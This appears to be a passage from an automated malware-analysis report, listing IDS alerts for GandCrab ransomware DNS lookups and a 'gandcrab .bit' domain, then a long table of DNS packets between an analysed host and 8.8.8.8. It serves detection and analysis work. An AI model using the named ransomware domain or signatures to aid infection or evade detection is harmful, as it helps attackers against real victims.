                                      192.168.2.38.8.8.857391532829498 09/01/22-00:00:05.158775UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15739153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858303532829498 08/31/22-23:59:32.323930UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15830353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860584532026737 08/31/22-23:58:15.004694UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858123532026737 08/31/22-23:59:27.268863UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5812353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860091532026737 08/31/22-23:59:14.371988UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6009153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865200532026737 08/31/22-23:59:03.482704UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6520053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853433532829498 08/31/22-23:59:18.325585UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850787532829498 08/31/22-23:59:48.189200UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15078753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860751532829498 08/31/22-23:58:42.984219UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16075153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850786532829498 08/31/22-23:59:48.168544UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15078653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853468532026737 08/31/22-23:58:56.731128UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5346853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.849206532026737 08/31/22-23:59:56.381031UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860475532829498 08/31/22-23:59:59.877731UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.863448532026737 08/31/22-23:59:36.563649UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6344853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.851997532829498 08/31/22-23:59:24.265731UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15199753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856618532026737 09/01/22-00:00:02.100951UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5661853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853471532026737 08/31/22-23:58:56.793274UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5347153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853054532829498 08/31/22-23:59:12.369224UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852458532829498 09/01/22-00:00:11.330853UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15245853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865513532026737 08/31/22-23:59:20.720500UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6551353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860828532829498 08/31/22-23:59:53.952246UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16082853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.864124532026737 08/31/22-23:59:50.605079UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6412453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.862052532829498 08/31/22-23:58:21.699516UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16205253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.857390532829498 09/01/22-00:00:05.138814UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15739053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850233532026737 09/01/22-00:00:07.502496UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860090532026737 08/31/22-23:59:14.353291UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6009053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852459532829498 09/01/22-00:00:11.350932UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15245953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860827532829498 08/31/22-23:59:53.930680UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16082753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853469532026737 08/31/22-23:58:56.749513UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5346953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850232532026737 09/01/22-00:00:07.481526UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865387532829498 08/31/22-23:59:40.854236UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16538753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.863451532026737 08/31/22-23:59:36.620733UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6345153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.864125532026737 08/31/22-23:59:50.625202UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6412553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860476532829498 08/31/22-23:59:59.898864UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.854157532026737 08/31/22-23:59:42.301537UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5415753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.857392532829498 09/01/22-00:00:05.176878UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15739253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852460532829498 09/01/22-00:00:11.371195UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15246053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.857389532829498 09/01/22-00:00:05.118977UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15738953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856043532829498 08/31/22-23:58:21.768917UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15604353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853052532829498 08/31/22-23:59:12.328339UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.861419532829498 08/31/22-23:59:01.474961UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16141953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.851996532829498 08/31/22-23:59:24.245596UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15199653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853432532829498 08/31/22-23:59:18.305428UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860585532026737 08/31/22-23:58:15.025136UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.863450532026737 08/31/22-23:59:36.602428UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6345053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860477532829498 08/31/22-23:59:59.919053UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856951532026737 08/31/22-23:58:46.526858UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5695153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865112532829498 08/31/22-23:58:33.402809UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16511253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865020532829498 08/31/22-23:58:54.651252UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16502053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.863449532026737 08/31/22-23:59:36.584182UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6344953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865201532026737 08/31/22-23:59:03.503720UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6520153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860830532829498 08/31/22-23:59:53.997132UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16083053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.859640532026737 08/31/22-23:58:24.925442UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5964053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.864123532026737 08/31/22-23:59:50.576561UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6412353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850788532829498 08/31/22-23:59:48.220006UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15078853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860092532026737 08/31/22-23:59:14.392903UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6009253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858124532026737 08/31/22-23:59:27.287358UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5812453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865199532026737 08/31/22-23:59:03.462712UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6519953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.859639532026737 08/31/22-23:58:24.905091UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5963953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856953532026737 08/31/22-23:58:46.573613UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5695353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858304532829498 08/31/22-23:59:32.344904UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15830453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860752532829498 08/31/22-23:58:43.003278UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16075253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865514532026737 08/31/22-23:59:20.740564UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6551453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860829532829498 08/31/22-23:59:53.975918UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16082953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.862053532829498 08/31/22-23:58:21.721380UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16205353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856621532026737 09/01/22-00:00:02.160962UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5662153192.168.2.38.8.8.8

                                      Network Port Distribution

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 31, 2022 23:58:02.760505915 CEST4930253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:02.778575897 CEST53493028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:04.036793947 CEST5397553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:04.649065018 CEST53539758.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:04.671662092 CEST5397653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:04.690844059 CEST53539768.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:04.692158937 CEST5397753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:04.712151051 CEST53539778.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:04.718662977 CEST5397853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:04.738368988 CEST53539788.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:04.739443064 CEST5397953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:04.757306099 CEST53539798.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:04.757896900 CEST5398053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:04.775638103 CEST53539808.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:07.165702105 CEST5295553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:07.250682116 CEST53529558.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:07.294450998 CEST5295653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:07.311570883 CEST53529568.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:07.312591076 CEST5295753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:07.330202103 CEST53529578.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:07.331283092 CEST5295853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:07.351011992 CEST53529588.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:07.365561008 CEST5295953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:07.383272886 CEST53529598.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:07.384051085 CEST5296053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:07.404005051 CEST53529608.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:13.881591082 CEST6058253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:14.902959108 CEST6058253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:14.937246084 CEST53605828.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:14.982489109 CEST6058353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:15.000052929 CEST53605838.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:15.004693985 CEST6058453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:15.024588108 CEST53605848.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:15.025135994 CEST6058553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:15.043148041 CEST53605858.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:15.043750048 CEST6058653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:15.064032078 CEST53605868.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:15.064662933 CEST6058753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:15.082518101 CEST53605878.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:17.123805046 CEST5713453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.161257982 CEST5713453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.234639883 CEST53571348.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.235239029 CEST53571348.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.284126997 CEST5713553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.303237915 CEST53571358.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.304316998 CEST5713653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.324134111 CEST53571368.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.324816942 CEST5713753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.344474077 CEST53571378.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.345424891 CEST5713853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.363096952 CEST53571388.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.371185064 CEST5713953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:18.391031981 CEST53571398.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:18.899728060 CEST53605828.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:20.518393040 CEST6205053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.514583111 CEST6205053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.646465063 CEST53620508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:21.674954891 CEST6205153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.675831079 CEST53620508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:21.698769093 CEST53620518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:21.699516058 CEST6205253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.720890999 CEST53620528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:21.721379995 CEST6205353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.744118929 CEST53620538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:21.744663000 CEST6205453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.768213034 CEST53620548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:21.768917084 CEST5604353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:21.789768934 CEST53560438.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:23.738740921 CEST5963653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.732259989 CEST5963653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.804043055 CEST53596368.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:24.850137949 CEST5963753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.869385004 CEST53596378.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:24.884406090 CEST5963853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.904200077 CEST53596388.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:24.905091047 CEST5963953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.924804926 CEST53596398.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:24.925441980 CEST5964053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.943135023 CEST53596408.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:24.944174051 CEST5964153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:24.964257956 CEST53596418.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:27.219465017 CEST5563853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:27.255918026 CEST53556388.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:27.292717934 CEST5563953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:27.311678886 CEST53556398.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:27.316054106 CEST5564053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:27.336108923 CEST53556408.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:27.336745024 CEST5564153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:27.355282068 CEST53556418.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:27.361900091 CEST5564253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:27.381726027 CEST53556428.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:27.382469893 CEST5564353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:27.402415991 CEST53556438.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:28.756191015 CEST53596368.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:32.660929918 CEST6076753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:33.272780895 CEST53607678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:33.320008993 CEST6510853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:33.337179899 CEST53651088.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:33.338202000 CEST6510953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:33.357716084 CEST53651098.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:33.358758926 CEST6511053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:33.378457069 CEST53651108.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:33.379307032 CEST6511153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:33.398911953 CEST53651118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:33.402808905 CEST6511253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:33.424699068 CEST53651128.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:35.661753893 CEST5869153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:36.474462986 CEST53586918.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:36.532491922 CEST5869253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:36.549562931 CEST53586928.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:36.550637007 CEST5869353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:36.570236921 CEST53586938.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:36.580327988 CEST5869453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:36.600003004 CEST53586948.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:36.600605965 CEST5869553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:36.618398905 CEST53586958.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:36.619046926 CEST5869653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:36.638629913 CEST53586968.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:38.594002962 CEST5330553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.608630896 CEST5330553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.644859076 CEST53533058.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:39.711462975 CEST5943453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.735524893 CEST53594348.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:39.736547947 CEST5943553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.759757996 CEST53594358.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:39.762542009 CEST5943653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.798645973 CEST53594368.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:39.799617052 CEST5943753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.823673964 CEST53594378.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:39.827074051 CEST5943853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:39.854238987 CEST53594388.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:40.380073071 CEST53533058.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:41.899421930 CEST6074953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:42.906723976 CEST6074953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:42.943233967 CEST53607498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:42.963799000 CEST6075053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:42.983344078 CEST53607508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:42.984219074 CEST6075153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.002011061 CEST53607518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.003278017 CEST6075253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.023278952 CEST53607528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.024086952 CEST6075353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.043633938 CEST53607538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.044194937 CEST6075453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.062766075 CEST53607548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.196578026 CEST53607498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:45.860322952 CEST5694953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.470341921 CEST53569498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.506845951 CEST5695053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.525938988 CEST53569508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.526858091 CEST5695153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.544490099 CEST53569518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.555077076 CEST5695253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.573009968 CEST53569528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.573612928 CEST5695353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.593744993 CEST53569538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.594398022 CEST5695453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.614161015 CEST53569548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.439661980 CEST5384453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.489172935 CEST53538448.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.509126902 CEST5384553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.528167963 CEST53538458.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.529035091 CEST5384653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.548969030 CEST53538468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.552397013 CEST5384753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.570151091 CEST53538478.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.570688963 CEST5384853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.590229988 CEST53538488.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.590786934 CEST5384953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.608671904 CEST53538498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.559582949 CEST6501753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.588342905 CEST53650178.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.611123085 CEST6501853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.628262997 CEST53650188.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.630989075 CEST6501953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.650563002 CEST53650198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.651252031 CEST6502053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.668998957 CEST53650208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.669703007 CEST6502153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.689425945 CEST53650218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.690068007 CEST6502253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.709500074 CEST53650228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.637871027 CEST5346653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.674391985 CEST53534668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.711035013 CEST5346753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.730349064 CEST53534678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.731127977 CEST5346853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.748970032 CEST53534688.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.749512911 CEST5346953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.769344091 CEST53534698.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.772804976 CEST5347053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.792510033 CEST53534708.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.793273926 CEST5347153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.812910080 CEST53534718.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.232460976 CEST5362353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.266350985 CEST53536238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.292783976 CEST5362453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.311882973 CEST53536248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.312763929 CEST5362553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.332475901 CEST53536258.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.338818073 CEST5362653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.356389046 CEST53536268.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.357353926 CEST5362753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.374880075 CEST53536278.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.376303911 CEST5362853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.394289017 CEST53536288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.363595963 CEST6141653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.399610996 CEST53614168.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.436424971 CEST6141753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.453686953 CEST53614178.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.454658031 CEST6141853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.474419117 CEST53614188.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.474961042 CEST6141953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.492651939 CEST53614198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.493232965 CEST6142053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.511037111 CEST53614208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.511754036 CEST6142153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.529551029 CEST53614218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.366775036 CEST6519653192.168.2.38.8.8.8
